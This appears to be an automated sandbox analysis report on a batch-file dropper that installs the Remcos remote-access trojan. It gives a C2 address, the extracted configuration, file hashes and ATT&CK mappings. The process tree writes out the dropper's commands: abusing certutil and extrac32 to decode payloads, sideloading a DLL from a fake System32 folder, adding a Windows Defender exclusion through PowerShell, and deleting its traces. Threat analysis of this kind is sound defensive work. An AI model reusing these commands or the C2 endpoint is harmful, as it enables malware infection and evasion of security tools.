Analysis

  • max time kernel
    299s
  • max time network
    301s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    10-04-2024 21:02

General

  • Target

    851b1f4779b2875dcbb966c5c062d4766655c3d5d94693c93b33ec66fcd8f208.bat

  • Size

    3.2MB

  • MD5

    b766a151851fff661fd05df17c722fe0

  • SHA1

    b72ca0ded29114b5d4f333e2c8d32f37f075c059

  • SHA256

    851b1f4779b2875dcbb966c5c062d4766655c3d5d94693c93b33ec66fcd8f208

  • SHA512

    1940cf3c9b83c4298d6beffc612657e379073dfce854b14306919d5fe8a73c888906cdeebdb7803f3ab5ae41a44a0b04fc2520d675dc9ebd253dce4ad0faae60

  • SSDEEP

    49152:Xf2itfXve4rdS832GjhZqBaN6y3L8boHHTA0:Z

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

jaztc.duckdns.org:1808

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    sfsfdrgrre

  • mouse_option

    false

  • mutex

    Rmc-AJ5P19

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • ModiLoader Second Stage 1 IoCs
  • Executes dropped EXE 9 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 53 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\851b1f4779b2875dcbb966c5c062d4766655c3d5d94693c93b33ec66fcd8f208.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1888
    • C:\Windows\System32\extrac32.exe
      C:\\Windows\\System32\\extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
      2⤵
        PID:4824
      • C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3588
        • C:\Windows\system32\extrac32.exe
          extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
          3⤵
            PID:836
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\851b1f4779b2875dcbb966c5c062d4766655c3d5d94693c93b33ec66fcd8f208.bat" "C:\\Users\\Public\\Yano.txt" 9
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4244
          • C:\Users\Public\kn.exe
            C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\851b1f4779b2875dcbb966c5c062d4766655c3d5d94693c93b33ec66fcd8f208.bat" "C:\\Users\\Public\\Yano.txt" 9
            3⤵
            • Executes dropped EXE
            PID:968
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Yano.txt" "C:\\Users\\Public\\Libraries\\Yano.com" 12
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2956
          • C:\Users\Public\kn.exe
            C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Yano.txt" "C:\\Users\\Public\\Libraries\\Yano.com" 12
            3⤵
            • Executes dropped EXE
            PID:824
        • C:\Users\Public\Libraries\Yano.com
          C:\Users\Public\Libraries\Yano.com
          2⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:4788
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\AprfgvrzO.bat" "
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4336
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
              4⤵
                PID:348
              • C:\Windows\SysWOW64\xcopy.exe
                xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y
                4⤵
                • Enumerates system info in registry
                PID:4416
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
                4⤵
                  PID:3848
                • C:\Windows\SysWOW64\xcopy.exe
                  xcopy "Aaa.bat" "C:\Windows \System32\" /K /D /H /Y
                  4⤵
                  • Enumerates system info in registry
                  PID:1156
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
                  4⤵
                    PID:1248
                  • C:\Windows\SysWOW64\xcopy.exe
                    xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y
                    4⤵
                    • Enumerates system info in registry
                    PID:4296
                  • C:\Windows \System32\easinvoker.exe
                    "C:\Windows \System32\easinvoker.exe"
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:1716
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\windows \system32\aaa.bat""
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3712
                      • C:\Windows\system32\cmd.exe
                        cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                        6⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4920
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                          7⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2100
                • C:\Windows\SysWOW64\extrac32.exe
                  C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Yano.com C:\\Users\\Public\\Libraries\\Aprfgvrz.PIF
                  3⤵
                    PID:428
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del "C:\Users\Public\Yano.txt" / A / F / Q / S
                  2⤵
                  • Executes dropped EXE
                  PID:2620
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
                  2⤵
                  • Executes dropped EXE
                  PID:4536

              Network

              MITRE ATT&CK Matrix ATT&CK v13

              Persistence

              Boot or Logon Autostart Execution

              1
              T1547

              Registry Run Keys / Startup Folder

              1
              T1547.001

              Privilege Escalation

              Boot or Logon Autostart Execution

              1
              T1547

              Registry Run Keys / Startup Folder

              1
              T1547.001

              Defense Evasion

              Modify Registry

              1
              T1112

              Discovery

              Query Registry

              1
              T1012

              System Information Discovery

              1
              T1082

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\ProgramData\sfsfdrgrre\logs.dat
                Filesize

                144B

                MD5

                d97c819aba365299b1ec9af3d2114e6f

                SHA1

                c3de6c35659874d530022bc973ef585cdca72859

                SHA256

                3911184a381f68f7c2731ed8d567d98b28bd98dd1e4158535fd579a57947bac3

                SHA512

                40ac4204c2f82f856b2ce23a4a82b4205a31200092e50c6f0d7dd944a8ed1419ce8b381811be1b4fb6e8004dcfb88339c9e1250bafd258f822c7a64b6e9b3523

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n1aex4lx.otp.ps1
                Filesize

                1B

                MD5

                c4ca4238a0b923820dcc509a6f75849b

                SHA1

                356a192b7913b04c54574d18c28d46e6395428ab

                SHA256

                6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                SHA512

                4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

              • C:\Users\Public\Libraries\AprfgvrzO.bat
                Filesize

                29KB

                MD5

                828ffbf60677999579dafe4bf3919c63

                SHA1

                a0d159a1b9a49e9eaccc53fe0c3266c0526a1bdc

                SHA256

                abac4a967800f5da708572ec42441ec373cd52459a83a8a382d6b8579482789d

                SHA512

                bf00909e24c5a6fb2346e8457a9adacd5f1b35988d90abbde9ff26896bbb59edafea60d9db4d10182a7b5e129bb69585d3e20bc5c63af3517b3a7ef1e45ffb7e

              • C:\Users\Public\Libraries\Yano.com
                Filesize

                1.2MB

                MD5

                6e81d417826597c23f59c6dc8d0e9325

                SHA1

                6b8f936e6d7249471d1acdf5e3ec50faea11211a

                SHA256

                92286b5317d643787e4109d2d7354e94593416720d0b8f8aa2d497a16a24f377

                SHA512

                37dfc57c6ada7b379150c1085dcef8b01b4e950f011bc45f50889c883ff28d33a0be4fb0a66f1b1a8d862a6e37dcaf1f810b66bd094b7baff5cfb8f041d198cc

              • C:\Users\Public\Libraries\aaa.bat
                Filesize

                18KB

                MD5

                f4e8f0ec6cfc5c6039402322685cb6ce

                SHA1

                1037835573c2886dda05d256f15306da89dc645e

                SHA256

                cd05094e213643d624996b98e14aa5f7a2363f63530fe0c99523f6948effe756

                SHA512

                c5f9dfbbdb437c8ef9e2dd53fcbafcb256ab4626b4637a21332b3112c20f0d5353674031aae21b57604ba80d3b3f51f11b0ed412ed5fa6641b32fc4793746e02

              • C:\Users\Public\Libraries\easinvoker.exe
                Filesize

                128KB

                MD5

                231ce1e1d7d98b44371ffff407d68b59

                SHA1

                25510d0f6353dbf0c9f72fc880de7585e34b28ff

                SHA256

                30951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96

                SHA512

                520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612

              • C:\Users\Public\Libraries\netutils.dll
                Filesize

                112KB

                MD5

                30468939b69d5b1f29494fff5b161e6b

                SHA1

                3f900a76e5a00efd97c618c8cdaa55e66384618f

                SHA256

                7c6b2128913876dcb70603f2c00618d2e9057f381766565baf2a37100b85f1fd

                SHA512

                f59fc26b77b28bc0dce41f2542c95a0fcb32204cc2d840d7cf8e74e10fbfc238f0c360e3bb5d787f32c83668ad10bbe522e098ede52f178dd8555c7af530f27f

              • C:\Users\Public\Yano.txt
                Filesize

                2.3MB

                MD5

                4cf5c11880ee66463fbbbd2d00371d09

                SHA1

                9c438f3129d126279e62d738ced076daf88090af

                SHA256

                47b157a5a99f3304a954236dd5f85978bd8dfb8a741abefd2798dfc2b2e2a8c7

                SHA512

                0915ee260c1e625779b7036c049bd2aafc43852d5585f3674bebca41189025db9c13d9cc4543fde579f61128c815107b5d765cc45e24e4f109f4aaf41038a9ce

              • C:\Users\Public\alpha.exe
                Filesize

                265KB

                MD5

                94912c1d73ade68f2486ed4d8ea82de6

                SHA1

                524ab0a40594d2b5f620f542e87a45472979a416

                SHA256

                9f7ebb79def0bf8cccb5a902db11746375af3fe618355fe5a69c69e4bcd50ac9

                SHA512

                f48a3b7a2e6426c0091bb159599921b8e4644c8ae83a2a2a82efc9d3e21e4e343d77339917d8aabed6d8025142a2a8e74bf1fa759edb6146bc6e39fbece9e05d

              • C:\Users\Public\kn.exe
                Filesize

                1.4MB

                MD5

                056c7d065f4622da9cc2848f47e2bae2

                SHA1

                6c6f18b0ec53dc63488961c4240ec584ac71c25f

                SHA256

                e09a2d7ecac1a10c89e27750a18790da06ddd7311965dbc9ab6096f636dae61c

                SHA512

                db158c9b669a2668149caf30df32595a488dcc831d7518ca2e793eac0885492a2eaee838914e706a585b7f3f1c801e299c697b2cec509204561bb098e16253d5

              • memory/1716-54-0x00000000613C0000-0x00000000613E3000-memory.dmp
                Filesize

                140KB

              • memory/2100-79-0x0000017AEE9F0000-0x0000017AEEA00000-memory.dmp
                Filesize

                64KB

              • memory/2100-107-0x00007FF91EBF0000-0x00007FF91F5DC000-memory.dmp
                Filesize

                9.9MB

              • memory/2100-60-0x0000017AEE960000-0x0000017AEE982000-memory.dmp
                Filesize

                136KB

              • memory/2100-61-0x00007FF91EBF0000-0x00007FF91F5DC000-memory.dmp
                Filesize

                9.9MB

              • memory/2100-62-0x0000017AEE9F0000-0x0000017AEEA00000-memory.dmp
                Filesize

                64KB

              • memory/2100-64-0x0000017AEE9F0000-0x0000017AEEA00000-memory.dmp
                Filesize

                64KB

              • memory/2100-66-0x0000017AEEC80000-0x0000017AEECF6000-memory.dmp
                Filesize

                472KB

              • memory/4788-116-0x0000000014970000-0x0000000015970000-memory.dmp
                Filesize

                16.0MB

              • memory/4788-139-0x0000000014970000-0x0000000015970000-memory.dmp
                Filesize

                16.0MB

              • memory/4788-30-0x0000000002720000-0x0000000003720000-memory.dmp
                Filesize

                16.0MB

              • memory/4788-112-0x0000000014970000-0x0000000015970000-memory.dmp
                Filesize

                16.0MB

              • memory/4788-114-0x0000000014970000-0x0000000015970000-memory.dmp
                Filesize

                16.0MB

              • memory/4788-115-0x0000000014970000-0x0000000015970000-memory.dmp
                Filesize

                16.0MB

              • memory/4788-29-0x0000000002720000-0x0000000003720000-memory.dmp
                Filesize

                16.0MB

              • memory/4788-117-0x0000000014970000-0x0000000015970000-memory.dmp
                Filesize

                16.0MB

              • memory/4788-118-0x0000000014970000-0x0000000015970000-memory.dmp
                Filesize

                16.0MB

              • memory/4788-119-0x0000000014970000-0x0000000015970000-memory.dmp
                Filesize

                16.0MB

              • memory/4788-121-0x0000000014970000-0x0000000015970000-memory.dmp
                Filesize

                16.0MB

              • memory/4788-127-0x0000000014970000-0x0000000015970000-memory.dmp
                Filesize

                16.0MB

              • memory/4788-128-0x0000000014970000-0x0000000015970000-memory.dmp
                Filesize

                16.0MB

              • memory/4788-28-0x0000000000B50000-0x0000000000B51000-memory.dmp
                Filesize

                4KB

              • memory/4788-138-0x0000000014970000-0x0000000015970000-memory.dmp
                Filesize

                16.0MB

              • memory/4788-32-0x0000000000400000-0x0000000000531000-memory.dmp
                Filesize

                1.2MB

              • memory/4788-149-0x0000000014970000-0x0000000015970000-memory.dmp
                Filesize

                16.0MB

              • memory/4788-150-0x0000000014970000-0x0000000015970000-memory.dmp
                Filesize

                16.0MB

              • memory/4788-160-0x0000000014970000-0x0000000015970000-memory.dmp
                Filesize

                16.0MB

              • memory/4788-161-0x0000000014970000-0x0000000015970000-memory.dmp
                Filesize

                16.0MB

              • memory/4788-171-0x0000000014970000-0x0000000015970000-memory.dmp
                Filesize

                16.0MB

              • memory/4788-172-0x0000000014970000-0x0000000015970000-memory.dmp
                Filesize

                16.0MB

              • memory/4788-182-0x0000000014970000-0x0000000015970000-memory.dmp
                Filesize

                16.0MB

              • memory/4788-183-0x0000000014970000-0x0000000015970000-memory.dmp
                Filesize

                16.0MB

              • memory/4788-193-0x0000000014970000-0x0000000015970000-memory.dmp
                Filesize

                16.0MB

              • memory/4788-194-0x0000000014970000-0x0000000015970000-memory.dmp
                Filesize

                16.0MB

              • memory/4788-204-0x0000000014970000-0x0000000015970000-memory.dmp
                Filesize

                16.0MB

              • memory/4788-205-0x0000000014970000-0x0000000015970000-memory.dmp
                Filesize

                16.0MB

              • memory/4788-215-0x0000000014970000-0x0000000015970000-memory.dmp
                Filesize

                16.0MB

              • memory/4788-216-0x0000000014970000-0x0000000015970000-memory.dmp
                Filesize

                16.0MB